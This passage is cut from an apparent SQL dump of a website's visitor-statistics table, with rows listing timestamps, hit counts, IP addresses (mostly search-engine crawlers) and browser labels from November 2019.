,'136.243.70.68','other'),(459862,1572989531,2,0,2,0,'157.55.39.249',''),(459863,1572989909,1,1,0,0,'54.36.149.36','other'),(459864,1572990536,1,1,0,0,'8.29.198.25','other'),(459865,1572991341,1,1,0,0,'8.29.198.26','other'),(459866,1572993192,1,1,0,0,'66.249.64.27','chrome'),(459867,1572994051,1,1,0,0,'141.8.142.128','other'),(459868,1572994357,2,2,0,0,'66.249.64.26','chrome'),(459869,1572994484,1,1,0,0,'207.46.13.26','other'),(459870,1572994497,2,2,0,0,'157.55.39.249','other'),(459871,1572995338,1,1,0,0,'141.8.188.12','other'),(459872,1572995367,1,1,0,0,'141.8.188.25','other'),(459873,1572996469,1,1,0,0,'88.99.2.203','other'),(459874,1572997923,1,1,0,0,'37.9.113.39','other'),(459875,1572997926,1,1,0,0,'141.8.142.2','other'),(459876,1572998393,1,1,0,0,'141.8.142.128','other'),(459877,1572999458,1,1,0,0,'66.249.64.27','chrome'),(459878,1572999522,2,0,2,0,'157.55.39.249',''),(459879,1572999813,1,1,0,0,'213.180.203.44','other'),(459880,1572999875,2,2,0,0,'212.90.45.139','firefox'),(459881,1572999946,1,1,0,0,'207.46.13.26','other'),(459882,1573001400,1,1,0,0,'8.29.198.27','other'),(459883,1573001716,1,1,0,0,'62.205.134.182','other'),(459884,1573002184,1,1,0,0,'8.29.198.25','other'),(459885,1573003710,1,1,0,0,'54.36.149.4','other'),(459886,1573004351,2,2,0,0,'207.46.13.26','other'),(459887,1573004627,1,1,0,0,'54.36.149.70','other'),(459888,1573005241,1,1,0,0,'141.8.188.20','other'),(459889,1573005246,1,1,0,0,'37.46.129.198','msie'),(459890,1573006209,1,1,0,0,'45.148.10.40','other'),(459891,1573006571,1,1,0,0,'213.180.203.44','other'),(459892,1573006892,1,1,0,0,'66.249.64.26','chrome'),(459893,1573006950,1,1,0,0,'54.36.149.94','other'),(459894,1573007589,1,1,0,0,'209.17.97.10','other'),(459895,1573007973,2,2,0,0,'157.55.39.234','other'),(459896,1573008049,1,1,0,0,'141.8.183.15','other'),(459897,1573009656,1,1,0,0,'34.94.214.9','other'),(459898,1573010103,1,1,0,0,'54.36.149.98','other'),(459899,1573010411,1,1,0,0,'54.36.149.62','other'),(459900,1573010524,1,1,0,0,'54.36.149.0','other'),(459901,1573011050,2,0,2,0,'157.55.39.234',''),(459902,1573011145,1,1,0,0,'54.36.149.77','other'),(459903,1573011781,1,1,0,0,'37.9.113.33','other'),(459904,1573012263,1,1,0,0,'8.29.198.26','other'),(459905,1573012390,1,1,0,0,'54.36.149.105','other'),(459906,1573012510,2,0,2,0,'157.55.39.234',''),(459907,1573012632,1,1,0,0,'66.249.64.27','chrome'),(459908,1573012703,1,1,0,0,'66.249.64.1','chrome'),(459909,1573012797,1,1,0,0,'207.46.13.25','other'),(459910,1573012924,1,1,0,0,'66.249.64.26','chrome'),(459911,1573012976,1,1,0,0,'54.36.149.42','other'),(459912,1573013026,1,1,0,0,'8.29.198.27','other'),(459913,1573013356,1,1,0,0,'5.45.207.49','other'),(459914,1573013994,2,2,0,0,'66.249.64.27','chrome'),(459915,1573014069,1,1,0,0,'54.36.149.40','other'),(459916,1573014408,1,1,0,0,'54.36.149.96','other'),(459917,1573014437,1,1,0,0,'37.9.113.33','other'),(459918,1573014440,1,1,0,0,'37.9.113.10','other'),(459919,1573015195,1,1,0,0,'66.249.64.26','chrome'),(459920,1573015775,1,1,0,0,'207.46.13.25','other'),(459921,1573015876,1,1,0,0,'178.154.200.33','other'),(459922,1573017303,1,1,0,0,'141.8.188.20','other'),(459923,1573017648,1,1,0,0,'207.46.13.25','other'),(459924,1573018313,1,1,0,0,'141.8.132.12','other'),(459925,1573018722,1,1,0,0,'5.45.207.44','other'),(459926,1573018926,1,1,0,0,'62.205.134.182','other'),(459927,1573019197,1,1,0,0,'207.46.13.25','other'),(459928,1573019290,1,1,0,0,'54.36.149.47','other'),(459929,1573019330,1,1,0,0,'54.36.149.81','other'),(459930,1573019626,2,2,0,0,'212.90.45.139','firefox'),(459931,1573019666,1,1,0,0,'66.249.64.28','chrome'),(459932,1573020105,1,1,0,0,'141.8.183.18','other'),(459933,1573020110,1,1,0,0,'141.8.188.12','other'),(459934,1573020114,1,1,0,0,'141.8.142.119','other'),(459935,1573021351,2,0,2,0,'157.55.39.203',''),(459936,1573021537,1,1,0,0,'141.8.183.15','other'),(459937,1573023064,1,1,0,0,'54.36.149.96','other'),(459938,1573023141,1,1,0,0,'8.29.198.25','other'),(459939,1573023665,1,1,0,0,'141.8.142.50','other'),(459940,1573023891,1,1,0,0,'8.29.198.26','other'),(459941,1573023933,1,1,0,0,'157.55.39.205','other'),(459942,1573024067,1,1,0,0,'141.8.132.12','other'),(459943,1573024309,1,1,0,0,'157.55.39.206','other'),(459944,1573024626,1,1,0,0,'66.249.64.28','chrome'),(459945,1573025363,1,1,0,0,'95.108.213.55','other'),(459946,1573025397,1,1,0,0,'178.154.200.13','other'),(459947,1573025417,1,1,0,0,'141.8.142.50','other'),(459948,1573025996,2,0,2,0,'157.55.39.49',''),(459949,1573026810,1,1,0,0,'5.45.207.65','other'),(459950,1573027519,1,1,0,0,'54.36.149.60','other'),(459951,1573028971,1,1,0,0,'66.249.64.28','chrome'),(459952,1573029232,2,2,0,0,'157.55.39.206','other'),(459953,1573029424,1,1,0,0,'37.9.113.10','other'),(459954,1573029449,1,1,0,0,'178.154.200.71','other'),(459955,1573029694,2,2,0,0,'157.55.39.49','other'),(459956,1573030222,1,1,0,0,'91.196.179.134','chrome'),(459957,1573030515,1,1,0,0,'91.196.178.81','firefox'),(459958,1573030560,1,1,0,0,'157.55.39.205','other'),(459959,1573031193,1,1,0,0,'207.46.13.25','other'),(459960,1573031660,1,1,0,0,'54.36.149.0','other'),(459961,1573031698,1,1,0,0,'141.8.188.18','other'),(459962,1573031736,1,1,0,0,'66.249.64.27','chrome'),(459963,1573031818,1,1,0,0,'91.200.54.165','chrome'),(459964,1573031853,1,1,0,0,'46.219.205.167','chrome'),(459965,1573032292,1,1,0,0,'91.196.178.81','firefox'),(459966,1573032309,1,1,0,0,'157.55.39.206','other'),(459967,1573032348,1,1,0,0,'185.76.69.18','chrome'),(459968,1573032648,1,1,0,0,'91.196.178.79','chrome'),(459969,1573032843,2,2,0,0,'157.55.39.49','other'),(459970,1573032917,1,1,0,0,'178.154.200.27','other'),(459971,1573033817,1,1,0,0,'66.42.114.54','chrome'),(459972,1573033996,1,1,0,0,'8.29.198.25','other'),(459973,1573034240,1,1,0,0,'66.249.64.27','chrome'),(459974,1573034459,1,1,0,0,'157.55.39.206','other'),(459975,1573034519,1,1,0,0,'54.36.149.64','other'),(459976,1573034750,1,1,0,0,'8.29.198.27','other'),(459977,1573035136,1,1,0,0,'66.235.169.51','chrome'),(459978,1573035513,1,1,0,0,'66.249.64.26','chrome'),(459979,1573035808,1,1,0,0,'157.55.39.205','other'),(459980,1573035870,1,1,0,0,'157.55.39.49','other'),(459981,1573036255,1,1,0,0,'157.55.39.206','other'),(459982,1573036831,1,1,0,0,'77.111.244.152','chrome'),(459983,1573036904,1,1,0,0,'54.36.149.20','other'),(459984,1573036917,1,1,0,0,'157.55.39.205','other'),(459985,1573037189,2,2,0,0,'95.213.141.126','opera'),(459986,1573037359,1,1,0,0,'54.36.149.28','other'),(459987,1573039128,1,1,0,0,'54.36.149.101','other'),(459988,1573039325,1,1,0,0,'54.36.149.21','other'),(459989,1573039786,1,1,0,0,'5.45.207.49','other'),(459990,1573039909,1,1,0,0,'94.178.36.183','chrome'),(459991,1573040274,1,1,0,0,'141.8.188.18','other'),(459992,1573040755,1,1,0,0,'66.249.64.28','chrome'),(459993,1573040773,3,3,0,0,'66.249.64.26','chrome'),(459994,1573041141,1,1,0,0,'157.55.39.205','other'),(459995,1573041645,1,1,0,0,'54.36.149.29','other'),(459996,1573042379,1,1,0,0,'157.55.39.206','other'),(459997,1573043553,1,1,0,0,'141.8.188.25','other'),(459998,1573044281,1,1,0,0,'109.74.154.72','chrome'),(459999,1573044882,1,1,0,0,'8.29.198.25','other'),(460000,1573045177,1,1,0,0,'86.105.9.92','msie'),(460001,1573045608,1,1,0,0,'8.29.198.27','other'),(460002,1573045903,1,1,0,0,'66.249.64.28','chrome'),(460003,1573046603,1,1,0,0,'157.55.39.206','other'),(460004,1573046955,1,1,0,0,'157.55.39.205','other'),(460005,1573047000,1,1,0,0,'91.196.178.66','chrome'),(460006,1573047124,1,1,0,0,'193.106.30.99','chrome'),(460007,1573047541,1,1,0,0,'54.36.149.61','other'),(460008,1573047577,1,1,0,0,'37.9.113.177','other'),(460009,1573048417,1,1,0,0,'91.196.177.46','firefox'),(460010,1573049099,1,1,0,0,'157.55.39.63','other'),(460011,1573049245,2,2,0,0,'134.249.146.125','chrome'),(460012,1573049393,2,2,0,0,'91.196.178.79','chrome'),(460013,1573049858,1,1,0,0,'66.249.64.26','chrome'),(460014,1573050188,2,2,0,0,'207.46.13.212','other'),(460015,1573050828,1,1,0,0,'54.36.149.63','other'),(460016,1573051139,1,1,0,0,'213.180.203.44','other'),(460017,1573051199,1,1,0,0,'95.46.140.13','opera'),(460018,1573051653,1,1,0,0,'95.46.140.13','msie'),(460019,1573052564,1,1,0,0,'91.196.178.134','firefox'),(460020,1573053025,1,1,0,0,'207.46.13.212','other'),(460021,1573053119,1,1,0,0,'54.36.149.27','other'),(460022,1573053691,1,1,0,0,'213.180.203.37','other'),(460023,1573053710,1,1,0,0,'54.36.149.52','other'),(460024,1573053723,1,1,0,0,'213.180.203.44','other'),(460025,1573054348,1,1,0,0,'54.36.149.94','other'),(460026,1573054513,1,1,0,0,'54.36.149.8','other'),(460027,1573055015,2,2,0,0,'213.180.203.44','other'),(460028,1573055021,1,1,0,0,'157.55.39.205','other'),(460029,1573055722,2,2,0,0,'212.90.45.139','firefox'),(460030,1573055756,1,1,0,0,'8.29.198.26','other'),(460031,1573056086,1,1,0,0,'213.180.203.44','other'),(460032,1573056479,1,1,0,0,'8.29.198.27','other'),(460033,1573057210,1,1,0,0,'66.249.64.26','chrome'),(460034,1573057442,1,1,0,0,'213.180.203.37','other'),(460035,1573057610,1,1,0,0,'54.36.149.97','other'),(460036,1573057947,1,1,0,0,'77.111.244.10','chrome'),(460037,1573058399,1,1,0,0,'91.196.178.65','firefox'),(460038,1573058825,1,1,0,0,'213.180.203.44','other'),(460039,1573059014,1,1,0,0,'77.74.177.114','chrome'),(460040,1573059769,1,1,0,0,'185.244.214.238','msie'),(460041,1573059920,2,0,2,0,'157.55.39.205',''),(460042,1573060767,1,1,0,0,'46.211.141.7','chrome'),(460043,1573061203,1,1,0,0,'207.46.13.212','other'),(460044,1573061314,1,1,0,0,'54.36.149.37','other'),(460045,1573063159,1,1,0,0,'213.180.203.37','other'),(460046,1573063885,1,1,0,0,'207.46.13.212','other'),(460047,1573063910,1,1,0,0,'66.249.64.26','chrome'),(460048,1573066624,2,2,0,0,'8.29.198.27','other'),(460049,1573067351,1,1,0,0,'66.249.64.28','chrome'),(460050,1573067677,1,1,0,0,'157.55.39.205','other'),(460051,1573068377,1,1,0,0,'91.196.178.70','firefox'),(460052,1573068633,3,1,2,0,'157.55.39.205',''),(460053,1573068936,1,1,0,0,'147.135.252.34','msie'),(460054,1573069203,1,1,0,0,'194.44.210.165','chrome'),(460055,1573069849,2,2,0,0,'157.245.230.184','other'),(460056,1573070320,1,1,0,0,'207.46.13.152','other'),(460057,1573070464,1,1,0,0,'66.249.64.28','chrome'),(460058,1573072430,1,1,0,0,'66.249.75.226','chrome'),(460059,1573073228,2,0,2,0,'157.55.39.205',''),(460060,1573073374,1,1,0,0,'141.8.142.2','other'),(460061,1573074049,1,1,0,0,'207.46.13.212','other'),(460062,1573074350,2,2,0,0,'207.46.13.152','other'),(460063,1573074385,1,1,0,0,'77.111.244.39','chrome'),(460064,1573074489,1,1,0,0,'213.180.203.44','other'),(460065,1573075672,1,1,0,0,'213.180.203.44','other'),(460066,1573075689,1,1,0,0,'213.180.203.37','other'),(460067,1573076116,1,1,0,0,'157.55.39.205','other'),(460068,1573076877,1,1,0,0,'213.180.203.44','other'),(460069,1573076992,1,1,0,0,'66.249.75.227','chrome'),(460070,1573077497,1,1,0,0,'8.29.198.27','other'),(460071,1573077671,122,122,0,0,'192.99.13.88','other'),(460072,1573078136,1,1,0,0,'213.180.203.44','other'),(460073,1573078201,1,1,0,0,'8.29.198.26','other'),(460074,1573078543,1,1,0,0,'66.220.149.47','other'),(460075,1573078576,129,129,0,0,'192.99.13.88','other'),(460076,1573078921,1,1,0,0,'66.249.75.226','chrome'),(460077,1573079002,1,1,0,0,'207.46.13.152','other'),(460078,1573079477,48,48,0,0,'192.99.13.88','other'),(460079,1573079865,1,1,0,0,'157.55.39.205','other'),(460080,1573080320,1,1,0,0,'66.249.75.226','chrome'),(460081,1573080516,1,1,0,0,'213.180.203.44','other'),(460082,1573081172,1,1,0,0,'157.55.39.205','other'),(460083,1573085488,1,1,0,0,'178.154.200.33','other'),(460084,1573086282,1,1,0,0,'207.46.13.152','other'),(460085,1573086590,1,1,0,0,'157.55.39.205','other'),(460086,1573086598,1,1,0,0,'213.180.203.44','other'),(460087,1573086607,1,1,0,0,'213.180.203.37','other'),(460088,1573086620,1,1,0,0,'178.154.200.33','other'),(460089,1573087762,2,2,0,0,'213.180.203.44','other'),(460090,1573087970,1,1,0,0,'207.46.13.152','other'),(460091,1573088114,1,1,0,0,'62.205.134.182','other'),(460092,1573088373,2,2,0,0,'8.29.198.26','other'),(460093,1573088910,1,1,0,0,'37.9.113.10','other'),(460094,1573090956,1,1,0,0,'66.249.75.66','chrome'),(460095,1573093718,1,1,0,0,'178.154.200.33','other'),(460096,1573094823,1,1,0,0,'213.180.203.44','other'),(460097,1573095996,41,41,0,0,'144.76.14.153','other'),(460098,1573096874,1,1,0,0,'213.180.203.44','other'),(460099,1573096877,1,1,0,0,'157.55.39.106','other'),(460100,1573096898,39,39,0,0,'144.76.14.153','other'),(460101,1573097465,1,1,0,0,'157.55.39.205','other'),(460102,1573097938,1,1,0,0,'157.55.39.106','other'),(460103,1573098007,52,52,0,0,'144.76.14.153','other'),(460104,1573098816,1,1,0,0,'207.46.13.2','other'),(460105,1573098925,51,51,0,0,'144.76.14.153','other'),(460106,1573099261,1,1,0,0,'8.29.198.26','other'),(460107,1573099738,1,1,0,0,'213.180.203.44','other'),(460108,1573099910,1,1,0,0,'8.29.198.27','other'),(460109,1573100442,1,1,0,0,'66.249.69.97','chrome'),(460110,1573100693,1,1,0,0,'213.180.203.37','other'),(460111,1573101519,1,0,1,0,'157.55.39.205',''),(460112,1573101847,2,1,1,0,'157.55.39.205',''),(460113,1573103174,1,1,0,0,'66.249.75.64','chrome'),(460114,1573103449,1,1,0,0,'66.249.75.66','chrome'),(460115,1573105281,1,1,0,0,'66.249.75.66','chrome'),(460116,1573105282,2,2,0,0,'213.180.203.44','other'),(460117,1573105349,1,1,0,0,'62.205.134.182','other'),(460118,1573105639,1,1,0,0,'213.159.213.137','chrome'),(460119,1573105978,1,1,0,0,'207.46.13.2','other'),(460120,1573106087,2,2,0,0,'66.249.75.64','chrome'),(460121,1573106402,1,1,0,0,'213.180.203.44','other'),(460122,1573108151,1,1,0,0,'157.55.39.205','other'),(460123,1573108309,1,1,0,0,'66.249.75.66','chrome'),(460124,1573110150,1,1,0,0,'8.29.198.25','other'),(460125,1573110717,1,1,0,0,'66.249.75.66','chrome'),(460126,1573110752,1,1,0,0,'8.29.198.26','other'),(460127,1573111089,1,1,0,0,'157.55.39.106','other'),(460128,1573111942,1,1,0,0,'66.249.75.66','chrome'),(460129,1573112129,1,1,0,0,'91.196.178.79','chrome'),(460130,1573114971,1,1,0,0,'157.55.39.205','other'),(460131,1573114975,1,1,0,0,'207.46.13.2','other'),(460132,1573114985,2,2,0,0,'157.55.39.106','other'),(460133,1573116075,2,2,0,0,'91.196.178.79','chrome'),(460134,1573116382,1,1,0,0,'179.61.152.68','chrome'),(460135,1573117269,1,1,0,0,'138.246.253.5','chrome'),(460136,1573118126,1,1,0,0,'207.46.13.2','other'),(460137,1573118797,1,1,0,0,'91.196.178.89','firefox'),(460138,1573119127,1,1,0,0,'91.196.178.188','chrome'),(460139,1573119697,1,1,0,0,'95.132.14.214','chrome'),(460140,1573120093,1,1,0,0,'207.46.13.2','other'),(460141,1573121017,1,1,0,0,'8.29.198.26','other'),(460142,1573121164,1,1,0,0,'91.196.178.79','chrome'),(460143,1573121241,1,1,0,0,'173.212.233.72','firefox'),(460144,1573121610,1,1,0,0,'8.29.198.27','other'),(460145,1573122173,1,1,0,0,'157.55.39.106','other'),(460146,1573122469,1,1,0,0,'185.244.214.238','msie'),(460147,1573123012,2,2,0,0,'66.249.75.68','chrome'),(460148,1573123954,1,1,0,0,'91.196.178.79','chrome'),(460149,1573124508,1,1,0,0,'66.249.75.64','chrome'),(460150,1573124871,1,1,0,0,'46.120.255.82','chrome'),(460151,1573125687,1,1,0,0,'91.196.178.9','chrome'),(460152,1573125817,2,2,0,0,'207.46.13.2','other'),(460153,1573126388,1,1,0,0,'213.180.203.44','other'),(460154,1573126806,1,1,0,0,'95.46.140.13','firefox'),(460155,1573127915,1,1,0,0,'46.211.158.108','chrome'),(460156,1573128483,2,1,1,0,'207.46.13.2',''),(460157,1573129038,1,1,0,0,'109.74.154.72','chrome'),(460158,1573129142,2,2,0,0,'91.196.178.79','chrome'),(460159,1573129359,1,1,0,0,'31.13.127.6','other'),(460160,1573129370,2,2,0,0,'31.13.103.1','other'),(460161,1573129461,1,1,0,0,'82.207.116.16','other'),(460162,1573130045,1,1,0,0,'91.196.177.110','chrome'),(460163,1573130054,1,1,0,0,'157.55.39.223','other'),(460164,1573130967,1,1,0,0,'185.212.240.74','firefox'),(460165,1573131873,3,3,0,0,'91.196.178.79','chrome'),(460166,1573131912,1,1,0,0,'8.29.198.27','other'),(460167,1573132183,1,1,0,0,'91.196.178.34','chrome'),(460168,1573132402,1,1,0,0,'207.46.13.2','other'),(460169,1573132471,1,1,0,0,'8.29.198.26','other'),(460170,1573132736,1,1,0,0,'207.46.13.247','other'),(460171,1573133576,1,1,0,0,'95.134.189.4','chrome'),(460172,1573134424,2,2,0,0,'66.249.70.62','chrome'),(460173,1573134507,1,1,0,0,'95.134.189.4','chrome'),(460174,1573134596,1,1,0,0,'91.196.178.133','chrome'),(460175,1573135082,1,1,0,0,'207.46.13.2','other'),(460176,1573136210,1,1,0,0,'66.249.64.26','chrome'),(460177,1573136461,1,1,0,0,'91.196.177.46','chrome'),(460178,1573137040,1,1,0,0,'91.196.178.79','chrome'),(460179,1573137408,2,2,0,0,'66.249.64.28','chrome'),(460180,1573137520,1,1,0,0,'66.249.64.26','chrome'),(460181,1573137692,1,1,0,0,'213.180.203.44','other'),(460182,1573138001,2,2,0,0,'207.46.13.2','other'),(460183,1573138008,1,1,0,0,'66.249.70.36','chrome'),(460184,1573138453,1,1,0,0,'91.196.178.79','chrome'),(460185,1573138585,1,1,0,0,'207.46.13.208','other'),(460186,1573138943,1,1,0,0,'66.249.64.27','chrome'),(460187,1573140845,1,1,0,0,'207.46.13.212','other'),(460188,1573140860,1,1,0,0,'91.196.178.34','chrome'),(460189,1573141752,1,1,0,0,'207.46.13.155','other'),(460190,1573142804,1,1,0,0,'8.29.198.27','other'),(460191,1573143055,1,1,0,0,'91.196.178.76','firefox'),(460192,1573143378,1,1,0,0,'8.29.198.26','other'),(460193,1573143452,2,2,0,0,'31.13.127.6','other'),(460194,1573143777,1,1,0,0,'66.249.64.28','chrome'),(460195,1573144701,1,1,0,0,'46.211.148.116','other'),(460196,1573145055,1,1,0,0,'66.249.65.132','chrome'),(460197,1573145277,1,1,0,0,'193.106.30.99','chrome'),(460198,1573145700,1,1,0,0,'77.111.244.112','chrome'),(460199,1573146424,1,1,0,0,'46.201.149.230','chrome'),(460200,1573148237,1,1,0,0,'91.196.178.61','chrome'),(460201,1573150333,1,1,0,0,'66.249.64.28','chrome'),(460202,1573150476,2,0,2,0,'207.46.13.155',''),(460203,1573151520,2,2,0,0,'91.209.11.236','other'),(460204,1573152172,1,1,0,0,'66.249.64.26','chrome'),(460205,1573152692,1,1,0,0,'91.209.11.236','other'),(460206,1573152870,1,1,0,0,'207.46.13.208','other'),(460207,1573153322,2,2,0,0,'66.249.70.33','chrome'),(460208,1573153510,1,1,0,0,'91.196.178.164','chrome'),(460209,1573153527,1,1,0,0,'87.250.224.90','other'),(460210,1573153694,1,1,0,0,'8.29.198.25','other'),(460211,1573154276,1,1,0,0,'8.29.198.27','other'),(460212,1573154481,1,1,0,0,'207.46.13.208','other'),(460213,1573155906,1,1,0,0,'93.175.222.175','chrome'),(460214,1573157059,1,1,0,0,'207.46.13.155','other'),(460215,1573158945,1,1,0,0,'66.249.64.27','chrome'),(460216,1573158967,1,1,0,0,'66.249.64.28','chrome'),(460217,1573159546,1,1,0,0,'188.163.96.143','other'),(460218,1573160078,2,0,2,0,'207.46.13.155',''),(460219,1573160330,1,1,0,0,'213.180.203.44','other'),(460220,1573160934,1,1,0,0,'66.249.64.28','chrome'),(460221,1573163134,1,1,0,0,'66.249.64.26','chrome'),(460222,1573163466,1,1,0,0,'188.190.230.111','chrome'),(460223,1573163474,2,2,0,0,'69.58.178.58','other'),(460224,1573163756,1,1,0,0,'207.46.13.208','other'),(460225,1573163914,1,1,0,0,'91.209.11.236','other'),(460226,1573163988,1,1,0,0,'207.46.13.155','other'),(460227,1573164587,1,1,0,0,'8.29.198.27','other'),(460228,1573164940,2,2,0,0,'213.180.203.44','other'),(460229,1573165133,1,1,0,0,'8.29.198.26','other'),(460230,1573165350,1,1,0,0,'207.46.13.208','other'),(460231,1573166141,1,1,0,0,'213.180.203.44','other'),(460232,1573166413,1,1,0,0,'207.46.13.208','other'),(460233,1573167225,1,1,0,0,'86.109.170.183','chrome'),(460234,1573167402,1,1,0,0,'213.180.203.44','other'),(460235,1573168896,1,1,0,0,'66.249.70.33','chrome'),(460236,1573169087,1,0,1,0,'66.249.64.27',''),(460237,1573169258,1,1,0,0,'209.17.96.242','other'),(460238,1573169491,1,1,0,0,'46.211.5.48','chrome'),(460239,1573169579,1,1,0,0,'173.252.95.42','other'),(460240,1573169616,1,1,0,0,'37.147.234.199','firefox'),(460241,1573169821,1,1,0,0,'207.46.13.19','other'),(460242,1573171531,2,2,0,0,'207.46.13.155','other'),(460243,1573172648,2,1,1,0,'207.46.13.19',''),(460244,1573172765,1,1,0,0,'207.46.13.174','other'),(460245,1573172878,1,1,0,0,'66.249.64.26','chrome'),(460246,1573173055,1,1,0,0,'66.249.64.28','chrome'),(460247,1573174437,1,1,0,0,'207.46.13.155','other'),(460248,1573174514,1,1,0,0,'62.205.134.182','other'),(460249,1573174610,1,1,0,0,'37.9.113.10','other'),(460250,1573174755,2,2,0,0,'213.180.203.44','other'),(460251,1573175456,1,1,0,0,'8.29.198.27','other'),(460252,1573175747,1,1,0,0,'94.153.110.208','chrome'),(460253,1573175836,1,1,0,0,'31.13.115.39','other'),(460254,1573175944,1,1,0,0,'207.46.13.19','other'),(460255,1573175972,1,1,0,0,'66.249.64.28','chrome'),(460256,1573175995,1,1,0,0,'8.29.198.26','other'),(460257,1573176168,1,1,0,0,'66.249.64.27','chrome'),(460258,1573176338,2,2,0,0,'213.180.203.44','other'),(460259,1573178128,2,2,0,0,'66.249.64.27','chrome'),(460260,1573178159,1,1,0,0,'46.211.144.184','chrome'),(460261,1573178414,1,1,0,0,'94.180.148.144','msie'),(460262,1573178670,1,1,0,0,'213.180.203.44','other'),(460263,1573180807,1,1,0,0,'66.249.64.28','chrome'),(460264,1573181222,1,1,0,0,'157.55.39.137','other'),(460265,1573182445,1,1,0,0,'66.249.70.33','chrome'),(460266,1573183105,1,1,0,0,'66.249.64.27','chrome'),(460267,1573183443,1,1,0,0,'37.9.113.10','other'),(460268,1573183620,1,1,0,0,'157.55.39.209','other'),(460269,1573184456,1,1,0,0,'141.8.142.2','other'),(460270,1573184693,2,2,0,0,'213.180.203.44','other'),(460271,1573185349,1,1,0,0,'93.171.249.2','chrome'),(460272,1573186343,2,2,0,0,'8.29.198.25','other'),(460273,1573187057,1,1,0,0,'66.249.70.36','chrome'),(460274,1573187542,2,2,0,0,'213.180.203.44','other'),(460275,1573187690,1,1,0,0,'66.249.70.33','chrome'),(460276,1573188825,1,1,0,0,'213.180.203.44','other'),(460277,1573188908,2,2,0,0,'66.249.64.26','chrome'),(460278,1573189514,1,1,0,0,'66.249.70.33','chrome'),(460279,1573191226,3,3,0,0,'66.249.64.28','chrome'),(460280,1573191472,1,1,0,0,'157.55.39.130','other'),(460281,1573191641,8,8,0,0,'66.249.64.27','chrome'),(460282,1573191676,22,22,0,0,'66.249.64.26','chrome'),(460283,1573191869,1,1,0,0,'62.205.134.182','other'),(460284,1573192061,3,3,0,0,'213.180.203.44','other'),(460285,1573192078,1,1,0,0,'138.246.253.5','chrome'),(460286,1573192798,1,1,0,0,'66.249.64.28','chrome'),(460287,1573193736,1,1,0,0,'37.52.162.98','firefox'),(460288,1573193957,1,1,0,0,'66.249.64.28','chrome'),(460289,1573194130,1,1,0,0,'31.13.127.1','other'),(460290,1573194131,1,1,0,0,'31.13.127.17','other'),(460291,1573194156,1,1,0,0,'94.153.98.66','chrome'),(460292,1573194197,1,1,0,0,'157.55.39.130','other'),(460293,1573194747,1,1,0,0,'91.196.178.67','chrome'),(460294,1573194989,1,1,0,0,'66.249.64.26','chrome'),(460295,1573195683,1,1,0,0,'213.180.203.44','other'),(460296,1573196727,1,1,0,0,'213.180.203.44','other'),(460297,1573196827,1,1,0,0,'213.180.203.37','other'),(460298,1573197114,1,1,0,0,'207.46.13.204','other'),(460299,1573197211,1,1,0,0,'8.29.198.26','other'),(460300,1573197372,1,1,0,0,'157.55.39.130','other'),(460301,1573197706,1,1,0,0,'8.29.198.25','other'),(460302,1573198617,1,1,0,0,'91.196.178.99','chrome'),(460303,1573199002,1,1,0,0,'213.180.203.44','other'),(460304,1573199042,1,1,0,0,'66.249.64.28','chrome'),(460305,1573199399,1,1,0,0,'157.55.39.130','other'),(460306,1573200930,1,1,0,0,'207.46.13.204','other'),(460307,1573201555,1,0,1,0,'66.249.64.26',''),(460308,1573202038,1,1,0,0,'157.55.39.209','other'),(460309,1573202054,1,1,0,0,'207.46.13.204','other'),(460310,1573202130,1,1,0,0,'157.55.39.137','other'),(460311,1573202680,1,1,0,0,'213.180.203.44','other'),(460312,1573203262,1,1,0,0,'207.46.13.204','other'),(460313,1573203717,1,1,0,0,'52.162.161.148','other'),(460314,1573203882,1,1,0,0,'213.180.203.37','other'),(460315,1573204439,1,1,0,0,'95.132.17.24','chrome'),(460316,1573204999,1,1,0,0,'157.55.39.130','other'),(460317,1573205047,1,1,0,0,'213.180.203.37','other'),(460318,1573205502,1,1,0,0,'91.196.178.67','chrome'),(460319,1573206049,1,1,0,0,'18.206.135.69','chrome'),(460320,1573206135,1,1,0,0,'213.180.203.44','other'),(460321,1573207609,1,1,0,0,'157.55.39.137','other'),(460322,1573207988,1,1,0,0,'91.196.178.68','firefox'),(460323,1573208070,1,1,0,0,'8.29.198.25','other'),(460324,1573208581,1,1,0,0,'8.29.198.26','other'),(460325,1573208686,1,1,0,0,'213.180.203.44','other'),(460326,1573209819,1,1,0,0,'66.249.64.27','chrome'),(460327,1573209990,2,2,0,0,'157.55.39.130','other'),(460328,1573210406,1,1,0,0,'66.249.64.28','chrome'),(460329,1573210927,1,1,0,0,'213.180.203.44','other'),(460330,1573211468,1,1,0,0,'185.210.87.81','chrome'),(460331,1573211577,2,2,0,0,'157.55.39.130','other'),(460332,1573211754,1,1,0,0,'157.55.39.209','other'),(460333,1573212889,1,1,0,0,'141.8.142.2','other'),(460334,1573213106,2,2,0,0,'157.55.39.137','other'),(460335,1573213194,1,1,0,0,'46.133.107.178','chrome'),(460336,1573214284,1,1,0,0,'23.129.64.196','opera'),(460337,1573214313,1,1,0,0,'157.55.39.130','other'),(460338,1573214995,1,1,0,0,'173.252.87.3','other'),(460339,1573214996,1,1,0,0,'173.252.79.8','other'),(460340,1573214999,1,1,0,0,'173.252.95.13','other'),(460341,1573216064,1,1,0,0,'109.74.154.72','chrome'),(460342,1573217531,1,1,0,0,'195.10.210.70','chrome'),(460343,1573218958,2,2,0,0,'8.29.198.27','other'),(460344,1573219292,1,1,0,0,'66.249.64.27','chrome'),(460345,1573219519,1,1,0,0,'213.180.203.44','other'),(460346,1573220966,1,1,0,0,'141.8.142.2','other'),(460347,1573223125,1,1,0,0,'46.211.131.229','chrome'),(460348,1573224621,2,2,0,0,'157.55.39.137','other'),(460349,1573227576,1,1,0,0,'194.242.96.77','chrome'),(460350,1573227606,1,1,0,0,'81.17.131.248','chrome'),(460351,1573227741,2,2,0,0,'213.180.203.44','other'),(460352,1573228369,1,1,0,0,'46.211.145.245','chrome'),(460353,1573228539,1,1,0,0,'81.17.131.248','chrome'),(460354,1573229842,2,2,0,0,'8.29.198.26','other'),(460355,1573229914,1,1,0,0,'157.55.39.130','other'),(460356,1573229918,1,1,0,0,'157.55.39.137','other'),(460357,1573229994,1,1,0,0,'157.55.39.209','other'),(460358,1573230728,1,1,0,0,'66.249.64.27','chrome'),(460359,1573232540,1,1,0,0,'213.180.203.44','other'),(460360,1573232712,1,1,0,0,'176.57.55.254','chrome'),(460361,1573233288,1,1,0,0,'213.180.203.37','other'),(460362,1573233562,1,1,0,0,'213.180.203.44','other'),(460363,1573234679,1,1,0,0,'139.59.10.121','firefox'),(460364,1573234737,2,2,0,0,'213.180.203.37','other'),(460365,1573235537,1,1,0,0,'213.180.203.44','other'),(460366,1573236869,1,1,0,0,'213.180.203.37','other'),(460367,1573238220,1,1,0,